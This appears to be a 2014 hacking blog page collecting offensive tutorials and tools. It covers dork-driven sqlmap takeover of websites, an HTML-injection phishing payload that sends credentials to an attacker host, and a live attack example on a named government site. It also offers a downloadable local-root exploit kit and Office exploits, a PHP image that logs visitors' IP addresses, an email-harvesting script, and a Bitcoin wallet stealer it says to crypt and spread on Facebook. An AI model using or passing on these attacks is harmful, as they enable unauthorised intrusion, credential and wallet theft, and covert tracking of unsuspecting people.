Wednesday 12 November 2014

Hack website using sqlmap | Kali Linux - BackTrack

In this tutorial I am going to show you how to hack a website with slqmap on Kali Linux.

Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.

Step 1
[*]Find Sql vulnerable site.
I will give you some dorks which may help you finding websites vulnerable to Sql Injection.

Code:
]inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2
[*]Test if the website is vulnerable
]To test if the website is vulnerable to Sqli just add " ' " at the end of the url. Like on the image below:



And press enter. If error appears like on the image below it means the website is vulnerable.




(I'm not going to explain advanced ways to check the website for sql vulnerabiities because there are plenty of tutuorials about that on CHF)

Ok, so we found the target. Now let's go ahed.

Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtaget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)

Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.



Now we will get the database name of the website.

Image has been scaled down 6% (700x460). Click this bar to view original image (741x486). Click image to open in new window.



We got the two database ohridhot_ohrid
and information_schema we will select ohridhot_ohrid
database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables

Image has been scaled down 4% (700x49). Click this bar to view original image (723
Posted by at 1 comment:

HTML INJECTION

[0x01] HTML Injection:
Hypertext Markup Language (HTML) injection, also known as "virtual defacement" is an attack on an application when the user is allowed to inject HTML code into the web application through user input fields. When the web application is not able to properly handle requests from users, an attacker can supply his own valid HTML code via a parameter value and get the application to validate the request to the server. Sometimes HTML Injection is also referred as XSS HTML Injection because the two attacks are essentially the same thing but with an XSS attack you are sending Java script and script tags as an attack vector whereas in HTML injection you are using simple HTML tags to modify the page.


[0x02] Just Defacing?
Okay so in the hacker community many people underestimate the true danger of HTML Injection. Also attackers don't leverage the attack to its full potential rather than just editing the content of a page to say "I hacked you!". No defacing is just the tip of the ice burg here. HTML Injection can lead to malicious pages being created that may contain a hidden java drive by, phishing, distributed ddos attacks that are java based and run through the browser, distributed cracking attacks thats go own through your browser as your browsing the malicious site, Cross site scripting, hidden browser exploits, beef networks, hidden malware, bitcoin mining, and much much more. These are just some of the things that attackers never even think about doing because most are just unaware of how dangerous this attack can be. Scenario of this attack being leveraged correctly:

[*] Attacker finds HTML Injection Vulnerability on Social Network Site.
[*] Attacker crafts malicious link & encodes it, containing his HTML code, and sends it to users.
[*] User visits page, due to the domain being trusted.
[*] User Visits encoded link unaware, the link redirects to login page,
(phishing page that was crafted by attacker)
[*] User enters credentials and attacker grabs login info.
[*] Attacker now has potential to nab thousands of logins, sell to spammers, use passwords as word lists for effective cracking, and get a lot of rep.


[0x03] The Attack:

Vulnerable Application Code:
Code:
<?php
    $username = $_REQUEST ['username'];
?>
<html>
<title>member search</title>
    <h1>Welcome to CHF!</h1>
    <br>
    <body>
            Searching For <?php echo $username; ?>!
        </body>
</html>

[*] Sorry for the poor code, I didn't add a user input field but lets just imagine that there is a search box there used to enter a user name to search. So in the input field I enter "DES". The URL would look like this after I press the search button.

Code:
http://www.chf.com/membersearch.php?username=DES

[*] Lets look at our code. The page is called membersearch.php it requests the parameter 'username' so thats why the url has ?username= and whatever is entered in your input field is set as the $username variable then echoed (printed) back onto the page. So after my search for DES, the page should say Searching for DES!. This is good, this means that whatever is entered into our input field and set as the $username variable is printed onto the page. So how about trying to enter HTML code after our ?username= and see if the server validates it.

Code:
http://www.chf.com/membersearch.php?username=<br><br><b>Hacked by DES</b>

[*] This will start two new lines and now have on our page in bold letters..
Code:
Searching for

Hacked by DES!


[0x04] Phishing Example:
Say In the above example I wanted to phish accounts. Well I would have to craft a link that will render the injected HTML, present a login form, and then comment out the rest of the page after the injection point with a <!-- to make it look a bit legit.

Code:
http://www.chf.com/membersearch.php?username=<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST"
action="http://DES-phish.com/login.txt">Username: <input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--

[*] So now I encode this link, shorten it and then send it around the forum or web page to users. Then when user names and passwords are submitted to my phishing link, the values are sent to http://DES-phish.com/login.txt via POST and logged.



[0x05] Persistent and NON Persistent:
Just like XSS, HTML Injection can be persistent and NON persistent. Persistent HTML Injection being very rare. Persistent HTML Injection is achieved the same way persistent XSS is, by being able to submit your malicious code into the web page rather it just be stored via a link. This can be possible say in many guest books, or in places where you can leave a comment to a post or whatever. Just make sure that page is vulnerable, and send your malicious HTML code as a comment or post. So then all people have to do is visit the link and you can do phishing more effective or have users see your deface or whatever you use this attack for.


[0x06] Live Example:
HTML Injection on the National Geophysical Data Center. Even Large sites are vulnerable to this attack. (Also Vuln to XSS, & SQLI on same parameter.)

Code:
http://www.ngdc.noaa.gov/hazard/quiz/jsp/quiz/kq.jsp?htype=<b>DES@CHF</b>


[0x07] Conclusion:
Hope you guys enjoyed this. Especially you d3v0id, pretty much wrote it for you as well as for others to learn. Read on, keep learning, and I will be providing more tutorials :>
Posted by at 1 comment:

PDF,DOC Office Exploits For Virus Lovers

Some Office Exploits for Virus Lovers



1st download python 2.7 then use it

Download Link
Posted by at 1 comment:

Klick And Root - Linux Local Root Exploiter

----------------------------------------------
KlickAndRoot - Linux Local Root Exploiter
----------------------------------------------
This is a small script to make the local exploitation process easier. The script download the choosen exploit from the local webserver, make it executable and run it.

[+] Exploit-List:

[1] nelson local priv esc (<= 2.6.37)(ED: 15704)
[2] ip_append_data() local ring0 root exploit (2.6 < 2.6.19)
[3] fs/pipe.c local kernel root(kit?) exploit (2.6.x)
[4] cups remote/local exploit (cups < 1.1.17)(use with -t 127.0.0.1)
[5] sock_sendpage() Local Root Exploit (2.4/2.6)
[8] ptrace_attach privilege escalation exploit (2.6.29)
[11] vmsplice Local Root Exploit (2.6.23 - 2.6.24)
[12] ftruncate()/open() Local Exploit (< 2.6.22)
[13] RDS privilege escalation exploit (>= 2.6.30)
[14] Mempodipper local root exploit (>=2.6.39, 32-bit and 64-bit)
[15] CAN BCM Privilege Escalation Exploit (< 2.6.36)
[16] Linux PERF_EVENTS - Local Root Exploit (= 2.6.32 - 3.8.10 x86_64)
[17] ia32syscall Emulation Local Root (< 2.6.36 x86_64)
[18] perf_swevent_init Local root Exploit (< 3.8.9 x86_64)

[+] How to use it:

[1] Copy the content of the directory webfolder to your web-root (default: /var/www)
[2] Now your web-root directory should have this structur: eg. /var/www/KlickAndRoot/
[*] The folder KlickAndRoot contains several pre-compiled Exploits
[3] Upload the KlickAndRoot.sh -Script to the target linux machine
[4] Give executable rights to the KlickAndRoot -Script (chmod 755 KlickAndRoot.sh)
[5] Execute the script and choose an exploit
[*] Feel free to modify the script to your needs.

Cheers!

Download Link
Posted by at 1 comment:

Steal IP With Image

With this technique, you can get IP's from forum threads, forum PM's, imageboards, emails, or basically anywhere you can show an image.
You will need an Apache server, I recommend XAMPP. Otherwise you can try it on a host. However, this technique didn't work on 000webhost (a free hosting provider).

There will be two files needed on the server. One is the PHP file and the other is the gif image. The PHP file will pretend to be the image (using image/gif header), and will log the IP and other info when the image is accessed. The PHP file will log all of this in the log.html file (which it will create).

Code:

<?php
$imageurl = "http://yourwebserver.com/image.gif";
$fp = fopen('log.html', 'a');
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$port = $_SERVER['REMOTE_PORT'];
$file = $_SERVER['HTTP_REFERER'];
$visitTime = date("M d, h:i A");
$data =" <tr><td>$visitTime</td><td>$ip</td><td></td><td>$port";
fwrite($fp, $data);
fclose($fp);
header("content-type: image/gif");
$image = ImageCreateFromGIF($imageurl);
imagegif($image);
ImageDestroy($image);
exit();
?>


The second file will be the image. Either you can have a 1x1 blank image, or an actual image. Save it as a gif and put it in the same folder as the php file. Change the imagelink in the PHP file to point to the image.

To test if it works, create a simple html file, change the loopback to your host:

Code:

<html><body><img src="http://127.0.0.1/image.php"</img>



Now go check the log.html. If theres a record, then it works.

To get IP's from a forum, either post the image.php as a picture on a thread, or send a PM with a message like:

Code:

Code:
http://my-ip.com/image.php



To get IP's through email is a little tricky. Most online email services won't let you attach PHP images. Also, the receiver must open the email and allow the images to be shown.
The only way I made it work was through Thunderbird.

Create a new message, and click on the attach icon on the formatting bar (not the big Attach button). You'll see options to attach a Link, anchor, image etc.
- Choose Image.
- In the link, enter something like
Code:
http://my-ip.com/image.php

- uncheck "attach this image to the message"
- select "don't use alternate text"
- click OK
- Send it, and choose send as HTML
Posted by at 1 comment:

Collects Email Addr From Database

#!/usr/bin/python
#Collects Email Addr From Database
#and writes them to a file.

#added dupe checking

#E x P L O i T I n c
#Ivan Ivanausqui - Joe Root
#http://www.xploit.com
#iivanausqui (at) Yahoo.com
#exploitinc (at) Yahoo.com
#8 Years old Exploit :)

import sys, re, sets

if len(sys.argv) != 3:
 print "\nUsage: ./dumpemail.py <database> <save file>"
 print "Example:"
 print "\t ./dumpemail.py db.sql emails.txt\n"
 sys.exit(1)

try:
  database = open(sys.argv[1], "r").read()
except(IOError):
  print "\nError: Check your db path\n"
  sys.exit(1)

emails =  list(sets.Set(re.findall('[\.\w]+@[a-zA-Z_]+?\.[a-zA-Z]{2,3}', database)))
if len(emails) >= 1:
 ofile = open(sys.argv[2], "a")
 print "\nFound:",len(emails)
 print "Writing to file:",sys.argv[2],"\n\n"
 for e in emails:
  print e
  ofile.writelines(e+"\n")
 ofile.close()
else:
 print "\n[-] No email addresses found\n"
print "\n[+] Done\n"
 
Posted by at 1 comment:

Bitcoin Wallet Stealer

Bitcoin Wallet Stealer

what tools you need for this stealer ??

1 :- Free Ftp Server
2 :- Crypter

open builder and enter you ftp server ip user pass and make virus
then fud with crypter and spread your virus on facebook google :)

Admin Email :- Hack2wwworld@yahoo.com

Download Link ===> https://dl.dropboxusercontent.com/u/95443494/Hack2World/Bitcoin%20Wallet%20Stealer.rar
Posted by at 1 comment:
Subscribe to: Posts (Atom)